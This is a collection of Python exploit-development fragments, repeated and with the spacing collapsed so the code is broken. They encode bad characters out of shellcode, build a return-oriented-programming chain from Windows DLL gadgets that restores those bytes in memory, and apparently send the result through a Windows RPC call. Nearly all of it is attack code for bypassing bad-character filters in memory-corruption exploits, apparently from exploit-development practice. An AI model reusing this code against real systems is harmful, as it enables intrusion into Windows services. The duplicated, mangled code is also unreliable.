defmapBadChars(sh): BADCHARS = b"\x00" i = 0 badIndex = [] while i < len(sh): for c in BADCHARS: if sh[i] == c: badIndex.append(i) i=i+1 return badIndex
defencodeShellcode(sh): BADCHARS = b"\x00" REPLACECHARS = b"\xff" encodedShell = sh for i in range(len(BADCHARS)): encodedShell = encodedShell.replace(struct.pack("B", BADCHARS[i]), struct.pack("B", REPLACECHARS[i])) return encodedShell
defdecodeShellcode(dllBase, badIndex, shellcode): BADCHARS = b"\x00" CHARSTOADD = b"\x01" restoreRop = b"" for i in range(len(badIndex)): if i == 0: offset = badIndex[i] else: offset = badIndex[i] - badIndex[i-1] neg_offset = (-offset) & 0xffffffff value = 0 for j in range(len(BADCHARS)): if shellcode[badIndex[i]] == BADCHARS[j]: value = CHARSTOADD[j] value = (value) | 0x11111100# DL print(hex(value))
defmapBadChars(sh): BADCHARS = b"\x00" i = 0 badIndex = [] while i < len(sh): for c in BADCHARS: if sh[i] == c: badIndex.append(i) i=i+1 return badIndex
defencodeShellcode(sh): BADCHARS = b"\x00" REPLACECHARS = b"\xff" encodedShell = sh for i in range(len(BADCHARS)): encodedShell = encodedShell.replace(struct.pack("B", BADCHARS[i]), struct.pack("B", REPLACECHARS[i])) return encodedShell
defdecodeShellcode(dllBase, badIndex, shellcode): BADCHARS = b"\x00" CHARSTOADD = b"\x01" restoreRop = b"" for i in range(len(badIndex)): if i == 0: offset = badIndex[i] else: offset = badIndex[i] - badIndex[i-1] neg_offset = (-offset) & 0xffffffff value = 0 for j in range(len(BADCHARS)): if shellcode[badIndex[i]] == BADCHARS[j]: value = CHARSTOADD[j] value = (value) | 0x11111100# DL print(hex(value))
# current EAX point to the address of shellcode-1 restoreRop += struct.pack("<L", (dllBase + 0x7637768e)) # POP ECX # RETN ** [WS2_32.DLL] ** restoreRop += struct.pack("<L", (neg_offset)) restoreRop += struct.pack("<L", (dllBase + 0x758ba9a8)) # SUB EAX,ECX # RETN ** [KERNEL32.DLL] ** restoreRop += struct.pack("<L", (0x7721aed0)) # POP EDX # RETN ** [ntdll.dll] ** restoreRop += struct.pack("<L", (value)) # values in DL restoreRop += struct.pack("<L", (dllBase + 0x755bc4eb)) # ADD BYTE PTR [EAX],DL # RETN ** [KERNELBASE.dll] ** return restoreRop
defmapBadChars(sh): BADCHARS = b"\x00\x09\x0a" i = 0 badIndex = [] while i < len(sh): for c in BADCHARS: if sh[i] == c: badIndex.append(i) i=i+1 return badIndex
defencodeShellcode(sh): BADCHARS = b"\x00\x09\x0a" REPLACECHARS = b"\xff\x10\x06" encodedShell = sh for i in range(len(BADCHARS)): encodedShell = encodedShell.replace(struct.pack("B", BADCHARS[i]), struct.pack("B", REPLACECHARS[i])) return encodedShell
defdecodeShellcode(dllBase, badIndex, shellcode): BADCHARS = b"\x00\x09\x0a" CHARSTOADD = b"\x01\xf9\x04" restoreRop = b"" for i in range(len(badIndex)): if i == 0: offset = badIndex[i] else: offset = badIndex[i] - badIndex[i-1] neg_offset = (-offset) & 0xffffffff value = 0 for j in range(len(BADCHARS)): if shellcode[badIndex[i]] == BADCHARS[j]: value = CHARSTOADD[j] value = (value) | 0x11111100# DL print(hex(value))
# current EAX point to the address of shellcode-1 restoreRop += struct.pack("<L", (dllBase + 0x7637768e)) # POP ECX # RETN ** [WS2_32.DLL] ** restoreRop += struct.pack("<L", (neg_offset)) restoreRop += struct.pack("<L", (dllBase + 0x758ba9a8)) # SUB EAX,ECX # RETN ** [KERNEL32.DLL] ** restoreRop += struct.pack("<L", (0x7721aed0)) # POP EDX # RETN ** [ntdll.dll] ** restoreRop += struct.pack("<L", (value)) # values in DL restoreRop += struct.pack("<L", (dllBase + 0x755bc4eb)) # ADD BYTE PTR [EAX],DL # RETN ** [KERNELBASE.dll] ** return restoreRop
print("Getting a handle to the RPC server") stubdata = struct.pack("<I", 0x02) res = call(dce, 4, stubdata) if res == -1: print("Something went wrong") sys.exit(1) res = struct.unpack("III", res)
if (len(res) < 3): print("Received unexpected length value") sys.exit(1)
print("Getting a handle to the RPC server") stubdata = struct.pack("<I", 0x02) res = call(dce, 4, stubdata) if res == -1: print("Something went wrong") sys.exit(1) res = struct.unpack("III", res)
if (len(res) < 3): print("Received unexpected length value") sys.exit(1)
print("Getting a handle to the RPC server") stubdata = struct.pack("<I", 0x02) res = call(dce, 4, stubdata) if res == -1: print("Something went wrong") sys.exit(1) res = struct.unpack("III", res)
if (len(res) < 3): print("Received unexpected length value") sys.exit(1)